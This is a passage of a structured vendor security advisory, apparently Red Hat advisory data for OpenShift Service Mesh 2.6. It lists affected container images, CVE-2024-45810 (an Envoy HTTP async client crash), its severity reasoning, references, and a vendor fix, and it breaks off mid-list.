"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: Malicious log injection via access logs", }, { cve: "CVE-2024-45810", cwe: { id: "CWE-119", name: "Improper Restriction of Operations within the Bounds of a Memory Buffer", }, discovery_date: "2024-09-20T00:40:31.483825+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313687", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy. Envoy will crash when the http async client is handling `sendLocalReply` under some circumstances, such as websocket upgrade and requests mirroring. The http async client will crash during the `sendLocalReply()` in http async client if the http async client is duplicating the status code or if the destruction of the router is called at the destructor of the async stream while the stream is deferred or deleted. This issue occurs when the stream decoder is destroyed but it's reference is called in `router.onDestroy()`, causing a segment fault. This will impact ext_authz if the `upgrade` and `connection` header are allowed.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Envoy crashes for `LocalReply` in HTTP async client", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in Envoy related to the HTTP async client crashing during `sendLocalReply()` is classified as moderate severity rather than important due to the crash is contingent on particular scenarios, such as websocket upgrades and request mirroring, which may not be common in all deployments. Additionally, while the segmentation fault can disrupt service, it does not compromise data integrity or expose sensitive information.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45810", }, { category: "external", summary: "RHBZ#2313687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313687", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45810", url: "https://www.cve.org/CVERecord?id=CVE-2024-45810", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45810", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45810", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q", }, ], release_date: "2024-09-20T00:15:03.153000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", 